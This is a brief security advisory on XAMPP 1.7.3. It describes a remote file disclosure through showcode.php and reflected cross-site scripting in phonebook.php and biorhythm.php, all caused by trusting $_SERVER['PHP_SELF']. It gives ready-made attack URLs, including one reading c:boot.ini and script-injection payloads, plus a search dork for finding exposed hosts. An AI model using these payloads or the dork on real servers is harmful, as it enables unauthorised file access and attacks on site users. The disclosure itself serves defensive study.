Xampp1.7.3

I. File disclosure

XAMPP is vulnerable to a remote file disclosure attack.
The vulnerability exists within the web application supplied with XAMPP.

http://[host]/xampp/showcode.php/c:boot.ini?showcode=1

showcode.php:
<?php
   echo '<br><br>';
   if ($_REQUEST['showcode'] != 1) {
   echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
   } else {
       $file = file_get_contents(basename($_SERVER['PHP_SELF']));
       echo "<h2>".$TEXT['global-sourcecode']."</h2>";
       echo "<textarea cols='100' rows='10'>";
       echo htmlspecialchars($file);
       echo "</textarea>";
   }
?>

showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.
What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.
basename() parses the last element of that path using "/" as a delimiter.

Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.
Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.

II. Cross Site Scripting

http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>

It is interesting to see the same programming error lead to another security vulnerability.
Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.
This can be exploited to perform Cross Site Scripting attacks.

biorhythm.php (line 75):
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">

dork: "inurl:xampp/biorhythm.php"